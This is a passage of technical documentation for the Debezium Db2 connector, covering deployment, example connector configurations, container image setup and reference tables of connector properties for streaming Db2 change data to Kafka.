Reinitialize the ASN service:\n+\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n\n.Additional resource\n\n{link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[Reference table for {prodname} Db2 management UDFs]\n\n\/\/ Type: assembly\n\/\/ ModuleID: deploying-debezium-db2-connectors\n\/\/ Title: Deploying {prodname} Db2 connectors\n[[db2-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\n\nWith https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and {link-kafka-docs}.html#connect[Kafka Connect] installed, the remaining tasks to deploy a {prodname} Db2 connector are:\n\n. Download the link:https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-db2\/{debezium-version}\/debezium-connector-db2-{debezium-version}-plugin.tar.gz[connector's plug-in archive].\n\n. Extract the JAR files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. Obtain the link:https:\/\/www.ibm.com\/support\/pages\/db2-jdbc-driver-versions-and-downloads[JDBC driver for Db2].\n. Add the JDBC driver JAR file to the directory with the {prodname} Db2 connector JARs.\n. {link-prefix}:{link-db2-connector}#db2-adding-connector-configuration[Configure the connector and add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s Container images] for Zookeeper, Kafka and Kafka Connect with the Db2 connector already installed and ready to run.\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nTo deploy a {prodname} Db2 connector, install the {prodname} Db2 connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect. Details are in the following topics:\n\n* xref:steps-for-installing-debezium-db2-connectors[]\n* xref:debezium-db2-connector-configuration-example[]\n* xref:adding-debezium-db2-connector-configuration-to-kafka-connect[]\n* xref:descriptions-of-debezium-db2-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"steps-for-installing-debezium-db2-connectors\"]\n=== Steps for installing {prodname} Db2 connectors\n\nTo install the Db2 connector, follow the procedures in {LinkDebeziumInstallOpenShift}[{NameDebeziumInstallOpenShift}]. The main steps are:\n\n. {LinkDebeziumUserGuide}#setting-up-db2-to-run-a-debezium-connector[Set up Db2 to run a {prodname} connector]. This enables Db2 replication to expose change-data for tables that are in capture mode.\n\n. Use link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat AMQ Streams] to set up Apache Kafka and Kafka Connect on OpenShift. AMQ Streams offers operators and images that bring Kafka to OpenShift.\n\n. Download the {prodname} link:https:\/\/access.redhat.com\/jbossnetwork\/restricted\/listSoftware.html?product=red.hat.integration&downloadType=distributions[Db2 connector].\n\n. Extract the files into your Kafka Connect environment.\n. Add the plug-in's parent directory to your Kafka Connect `plugin.path`, for example:\n+\n[source]\n----\nplugin.path=\/kafka\/connect\n----\n+\nThe above example assumes that you extracted the {prodname} Db2 connector to the `\/kafka\/connect\/{prodname}-connector-db2` path.\n\n. 
Restart your Kafka Connect process to ensure that the new JAR files are picked up.\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-configuration-example\n\/\/ Title: {prodname} Db2 connector configuration example\n[[db2-example-configuration]]\n=== Connector configuration example\n\nifdef::community[]\n\n[[db2-example]]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure the {prodname} Db2 connector in a `.json` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,json]\n----\n{\n \"name\": \"db2-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.db2.Db2Connector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"50000\", \/\/ <4>\n \"database.user\": \"db2inst1\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.dbname\": \"mydatabase\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"MYSCHEMA.CUSTOMERS\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\" \/\/ <11>\n }\n}\n----\n<1> The name of the connector when registered with a Kafka Connect service.\n<2> The name of this Db2 connector class.\n<3> The address of the Db2 instance.\n<4> The port number of the Db2 instance.\n<5> The name of the Db2 user.\n<6> The password for the Db2 user.\n<7> The name of the database to capture changes from.\n<8> The logical name of the Db2 instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n<9> A list of all tables whose changes {prodname} should capture.\n<10> The list of Kafka brokers that this connector uses to write and recover DDL statements to the database history topic.\n<11> The name of the database history topic where the connector writes and recovers DDL statements. This topic is for internal use only and should not be used by consumers.\n\nendif::community[]\n\nifdef::product[]\n\nFollowing is an example of the configuration for a Db2 connector that connects to a Db2 server on port 50000 at 192.168.99.100, whose logical name is `fullfillment`. Typically, you configure a {prodname} Db2 connector in a `.yaml` file using the configuration properties available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables. 
Optionally, ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[source,yaml,options=\"nowrap\",subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels: strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.db2.Db2Connector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: 192.168.99.100 \/\/ <4>\n database.port: 50000\n database.user: db2inst1\n database.password: Password!\n database.dbname: mydatabase\n database.server.name: fullfillment \/\/ <5>\n database.include.list: public.inventory \/\/ <6>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the address of the Db2 instance. \n\n|5\n|The logical name of the Db2 instance\/cluster, which forms a namespace and is used in the names of the Kafka topics to which the connector writes, the names of Kafka Connect schemas, and the namespaces of the corresponding Avro schema when the {link-prefix}:{link-avro-serialization}[Avro Connector] is used.\n\n|6\n|Changes in only the `public.inventory` database are captured.\n\n|===\n\nendif::product[]\n\nSee the {link-prefix}:{link-db2-connector}#db2-connector-properties[complete list of connector properties] that you can specify in these configurations.\n\nYou can send this configuration with a `POST` command to a running Kafka Connect service. The service records the configuration and starts one connector task that connects to the Db2 database, reads change-data tables for tables in capture mode, and streams change event records to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-db2-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} Db2 connector configuration to Kafka Connect\n[[db2-adding-connector-configuration]]\n=== Adding connector configuration\n\nifdef::community[]\nTo start running a Db2 connector, create a connector configuration and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* The {link-prefix}:{link-db2-connector}#setting-up-db2-to-run-a-debezium-connector[Db2 replication] is enabled to expose change-data for tables that are in capture mode\n\n* The Db2 connector is installed.\n\n.Procedure\n\n. Create a configuration for the Db2 connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.\n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} Db2 connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment.\n\n.Prerequisites\n\n* Podman or Docker is installed and you have sufficient rights to create and manage containers.\n* You installed the {prodname} Db2 connector archive. \n\n.Procedure\n\n. Extract the {prodname} Db2 connector archive to create a directory structure for the connector plug-in, for example:\n+\n[subs=+macros]\n----\npass:quotes[*tree .\/my-plugins\/*]\n.\/my-plugins\/\n\u251c\u2500\u2500 debezium-connector-db2\n\u2502 \u251c\u2500\u2500 ...\n----\n\n. 
Create and publish a custom image for running your {prodname} connector:\n\n.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:\n+\n[subs=\"+macros,+attributes\"]\n----\nFROM {DockerKafkaConnect}\nUSER root:root\npass:quotes[COPY _.\/my-plugins\/_ \/opt\/kafka\/plugins\/]\nUSER 1001\n----\n+\nBefore Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `\/opt\/kafka\/plugins` directory.\n\n.. Build the container image. For example, if you saved the `Dockerfile` that you created in the previous step as `debezium-container-for-db2`, and if the `Dockerfile` is in the current directory, then you would run the following command:\n+\n`podman build -t debezium-container-for-db2:latest .`\n\n.. Push your custom image to your container registry, for example:\n+\n`podman push debezium-container-for-db2:latest`\n\n.. Point to the new container image. Do one of the following:\n+\n* Edit the `spec.image` property of the `KafkaConnector` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnector\nmetadata:\n name: my-connect-cluster\nspec:\n #...\n image: debezium-container-for-db2\n----\n+\n* In the `install\/cluster-operator\/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.\n\n. Create a `KafkaConnector` custom resource that defines your {prodname} Db2 connector instance. See {LinkDebeziumUserGuide}#debezium-db2-connector-configuration-example[the connector configuration example].\n\n. Apply the connector instance, for example:\n+\n`oc apply -f inventory-connector.yaml`\n+\nThis registers `inventory-connector` and the connector starts to run against the `inventory` database.\n\n. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. 
The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `name`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `connector.class`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `tasks.max`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `database.hostname`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `database.port`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `database.user`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `database.password`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `database.dbname`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `database.server{zwsp}.name`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. 
The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `database.history{zwsp}.kafka.topic`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]\n[[db2-property-table-include-list]]<<db2-property-table-include-list, `table.include.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]\n[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `table.exclude.list`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]\n[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorthims and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. 
For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `tombstones.on{zwsp}.delete`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `column.truncate.to.{zwsp}_length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `column.mask{zwsp}.with._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero.
When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `message.key{zwsp}.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... 
+\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id="db2-advanced-configuration-properties"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols="30%a,25%a,45%a",options="header"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `snapshot.isolation{zwsp}.mode`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling{zwsp}.mode`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event.
+\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `max.queue.size.in.bytes`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default. It becomes active if the property is set to a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts.
If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits indefinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted. See the example that follows this table.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `provide.transaction{zwsp}.metadata`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n
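\nFor example, the following configuration fragment is a minimal sketch of using `snapshot.select.statement.overrides` with a large, append-only table. The `MYSCHEMA.ORDERS` table and the `ORDER_DATE` predicate are illustrative placeholders, not values from this documentation:\n\n[source,indent=0]\n----\nsnapshot.select.statement.overrides=MYSCHEMA.ORDERS\nsnapshot.select.statement.overrides.MYSCHEMA.ORDERS=SELECT * FROM MYSCHEMA.ORDERS WHERE ORDER_DATE > '2021-01-01'\n----\n\nWith this configuration, the snapshot contains only the rows that the `SELECT` statement returns; streaming of subsequent changes is unaffected.\n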
\n[id="db2-pass-through-properties"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n
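\nThe following example pulls the required properties together into a registration request body for the Kafka Connect REST API. This is a minimal sketch: the connector name, host, credentials, logical server name, table list, and history topic are illustrative placeholders, not values from this documentation.\n\n[source,json,indent=0]\n----\n{\n  "name": "db2-inventory-connector",\n  "config": {\n    "connector.class": "io.debezium.connector.db2.Db2Connector",\n    "database.hostname": "db2server",\n    "database.port": "50000",\n    "database.user": "db2inst1",\n    "database.password": "secret",\n    "database.dbname": "mydatabase",\n    "database.server.name": "mydatabase",\n    "table.include.list": "MYSCHEMA.CUSTOMERS",\n    "database.history.kafka.bootstrap.servers": "kafka:9092",\n    "database.history.kafka.topic": "schema-changes.mydatabase"\n  }\n}\n----\n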
